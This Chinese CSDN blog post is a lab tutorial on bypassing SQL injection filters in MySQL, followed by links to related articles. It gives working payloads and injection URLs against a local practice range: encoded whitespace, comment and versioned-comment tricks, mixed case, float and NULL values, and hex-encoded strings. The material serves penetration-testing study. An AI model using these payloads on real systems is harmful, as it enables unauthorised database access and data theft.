web安全之SQL注入绕过技术(一)

已于 2022-02-23 20:04:58 修改
阅读量2k 收藏 19
点赞数 3
分类专栏: WEB安全 文章标签: web安全 SQL注入 绕过技术 MYSQL 渗透测试
于 2022-02-23 20:04:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/123097920
版权

文中详细讲解web安全之SQL注入的绕过技术,通过文中内容更加深入的掌握SQL注入绕过技术原理及使用方法,从而更好的用于渗透测试中;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

SQL注入绕过技术(一)

空格绕过

在日常的sql注入中,通常会有一些防护设备,所以我们需要学习掌握sql注入绕过技术:

%09 #TAB 键(水平)
%0a #新建一行
%0c #新的一页
%0d #return 功能
%0b #TAB 键(垂直)
%a0 #空

在这里插入图片描述
当我们在浏览器中执行注入语句的时候,通常浏览器会自行将空格使用编码或者+号来代替:

vince%27+union+select+1%2C2+--++&submit=查询

当我们使用Burp抓包时,就可以看出已将后面的中文也进行了转码,主要的作用就是避免在数据库中查询时导致报错:
在这里插入图片描述
同样我们可以使用%0b来进行代替空格:

http://192.168.1.6/06/vul/sqli/sqli_str.php?name=vince%27%0bunion%0bselect%0b1%2C2%0b--++&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述
这里是可以一起使用的,都不会报错的:

%0b%09%09%09 #联合起来使用

在这里插入图片描述
在mysql中同样可以使用下面这个来代替空格:

/**/

在这里插入图片描述

/*aaaabbbbs*/  #因为在这个里面所有的内容是不会被执行的

在这里插入图片描述
所以我们在浏览器中同样可以使用:

http://192.168.1.6/06/vul/sqli/sqli_str.php?name=vince%27%2F**%2Funion%2F*aaaaaaa*%2Fselect%2F**%2F1%2C2+--+&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述
同样在mysql中还有另外一种可以代替空格:

/*!最少5位数字*/

在这里插入图片描述
经测试,这个比较特殊,里面是必须是5位数字,但如果超过5位,首数字要大于5,大多的解释都是说因为版本:

select * from/*!50009*/users/*!50009*/where/*!555555*/id=1;

在这里插入图片描述
还有就是这个语句在这个里面,它的作用是不会注释的,是数字则会:

select * from/*!44444*//*!users*/where/*!555555*/id=1;

在这里插入图片描述
可以看出执行语句中的users在这个注释中,但同样执行了语句,而前面是在这个注释中的是数字,则没有被执行,而且它同样可以作为空格来使用:

select * from/*!44444*//*!users*/where/*!*/id=1;

在这里插入图片描述

大小写绕过

我们通常也会使用将执行sql语句改成大小写,来绕过:

select * from users where id=1 UniOn SelEcT 1,2,3,4;

在这里插入图片描述
在浏览器中同样可以:

http://192.168.1.6/06/vul/sqli/sqli_str.php?name=vince%27+UniOn+Select+1%2C2%23+&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述

浮点数绕过

使用浮点数来进行绕过:
在这里插入图片描述
在浏览器中利用浮点数来绕过:

http://192.168.1.6/06/vul/sqli/sqli_str.php?name=8E0' union select 1,2 -- &submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述

NULL值绕过

select NULL #\N NULL 都是代表NULL值

在这里插入图片描述
所以我们同样可以利用它来进行绕过:

select * from users where id=\Nunion select 1,2,3,\N;
select * from users where id=Null union select 1,2,3,NULL;

在这里插入图片描述
同样在浏览器中执行:

http://192.168.1.6/06/vul/sqli/sqli_str.php?name=\N' union select database(),user()--%20&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述

引号绕过

有的时候会将引号过滤,所以我们可以使用双引号来进行绕过,因为在mysql里面也可以使用双引号作为字符串:
注:但这种必须是在程序里面也使用的双引号,才能使用双引号将其闭合。

select * from users where id="1";

在这里插入图片描述
我们也可以将这个值改为16进制来进行绕过:

select hex('admin');
select * from users where username=0x61646D696E;

在这里插入图片描述
这样即便gpc开启,但注入点是整形,同样也是可以使用16进制方法来进行绕行:
在这里插入图片描述

全局变量Global
关注
专栏目录
第十三节 SQL注入绕过技术-01
09-15
大小写绕过是最简单的 SQL 注入绕过方法之一。当程序中设置了过滤关键字时,如果过滤过程中没有对关键字组成进行深入分析过滤,那么攻击者可以通过修改关键字内字母大小写来绕过过滤措施。例如,如果程序过滤了 "and...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入是一种常见的网络攻击技术,攻击者通过构造特殊的SQL代码片段,利用Web应用程序与数据库之间的交互漏洞来获取、修改或者删除数据库中的信息。过滤逗号是安全领域常见的一种防御SQL注入的方法,因为SQL语句中...
Web安全原理剖析(十二)——SQL注入绕过技术
热门推荐
Phantom03167的博客
10-06 1万+
SQL注入绕过技术
web安全SQL注入绕过技术(三)
Longwaer
02-25 3868
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中使用。
WEB渗透SQL注入【3】[SQL注入绕过](8)
司徒荆的博客
10-11 286
SQL注入绕过
SQL 注入绕过(一)
不秃头的程序Yang
06-22 710
一、空格字符绕过
WEB安全的总结学习与心得(十五)——验证码绕过漏洞
weixin_44681434的博客
01-30 2720
WEB安全的总结与心得(十八) 01 文件操作 操作内容 文件上传 上传Webshell;上传木马 文件下载 下载系统任意文件;下载程序代码 常见文件操作漏洞 文件上传漏洞;任意文件下载漏洞;文件包含漏洞 02 ...
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
以下是对"使用SQL注入绕过认证"实验的详细说明: 一、实验目的 1. 了解并实践SQL注入的基本原理,掌握其在绕过认证过程中的应用。 2. 掌握多种常见的SQL注入绕过技巧,增强防御SQL注入的能力。 二、实验内容 实验...
Web应用安全:使用SQL注入绕过认证.pptx
06-17
4. **SQL注入绕过认证**: 认证过程通常涉及验证用户名和密码。攻击者可以通过构造特定的SQL语句来绕过验证,例如输入 `' or 1=1#` 作为用户名,这样原本的SQL查询会被改写,条件`1=1`总是为真,从而绕过密码检查。...
Web应用安全:使用SQL注入绕过方法文本.docx
06-17
### Web应用安全:深入解析SQL注入绕过方法 #### 概述 随着互联网技术的不断发展,Web应用程序成为了人们日常生活中不可或缺的一部分。然而,这也让Web应用程序成为黑客攻击的主要目标之一。其中,SQL注入是最常见...
SQL注入SQL注入绕过
qq_53086690的博客
04-21 1058
SQL注入原理 sql注入的原理就是后端无条件相信前端提交过来的代码,从而导致一些恶意的查询。 一般sql注入经常出现在URL的参数里,一些输入框里。 sql注入把前端提交的代码当成了后端查询的代码执行了。 SQL注入分类 SQL注入分为两类,一种是数字注入也是简单的一种,另一种是字符注入。 数字型注入 字符型注入 ...
SQL高级注入:混淆和绕过
qq_37870222的博客
07-06 1064
转:【0×01】 -过滤规避(Mysql)########################本节将阐述基于PHP和MySQL的过滤规避行为以及如何绕过过滤。过滤规避是一种用来防止SQL注入技术。这种技术可以用SQL函数,关键词过滤或者正则表达式完成。这就意味着过滤规避严重依赖如何储存一个黑名单或者正则表达式。如果黑名单或者正则表达式没有覆盖每一个注入情境,那么WEB程序对于SQL注入攻击来说仍旧是...
sql注入解析(四)避开过滤
ncafei的博客
03-14 1930
上一篇: http://www.2cto.com/Article/201209/153279.html web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被过滤的字符: 比如注入一个数字数据,就不需要使用单引号;’ or 1=1–,如果注释字符被过滤,我们可以这样写 ‘ or ’1′=’1 。 2、 避免使用简单确认:
五一假期特别篇——SQL注入绕过技术
南城无笙的Blog
05-02 198
五一特别篇:短篇:SQL注入中的绕过技术 这篇文章只简单介绍绕过技术 大小写混合绕过: 例如,当and1=1时noback,这是则是由于关键词被拦截,这时候可以使用大小写混合绕过例如AnD 、aND这种混合大小写的关键词,可以绕过部分过滤 双写绕过技术: 还是用and举例子,例如and 1=2时noback这时候可以采用双写关键词绕过,即anandd,这里and被过滤前面的an和d再次构成and,...
SQL 注入漏洞(十一)宽字节注入
不秃头的程序Yang
06-20 739
一、宽字节注入
SQL绕过技术
qq_51360929的博客
05-03 262
4.3 SQL绕过技术 4.3.1 大小写绕过注入 当正常使用SQL注入语句时,页面返回**“no hack”**,说明注入的语句被拦截了,有关键字被过滤,所以尝试使用大写构造语句,例如: ?id=1 And 1=1 或 aNd 1=1 或 anD 1=1 4.3.2双写绕过注入 比如在输入 : ?id=1 and 1=1 and可能会被过滤掉,只返回了1=1,那么我们就写成 ?id=1 anandd 1=1 他过滤掉了and,剩下的字母又组成了and,可以继续注入 4.3.3编码绕过注入 在发现被
生命在于学习——SQL注入绕过
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
SQL 注入绕过(三)
不秃头的程序Yang
06-27 1208
1、演示 五、二次编码绕过 1、原理分析 2、源码分析 2、源码分析
php 绕过gpc,PHP中GPC绕过的一些总结 -电脑资料
weixin_36315722的博客
03-13 708
lib3rt3邪恶八进制PS:PHP中绕过GPC的情况有很多,本文仅仅是总结了一些比较常见的,而且写的很浅(因为本人水平有限),欢迎大家积极拍砖:)ryat[at]wolvez.orghttp://www.wolvez.org2007-10-181.通过数据库(文本)中转通过数据库中转:(注意存入数据库和select出的数据)用户输入===>gpc\addslashes()=========...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值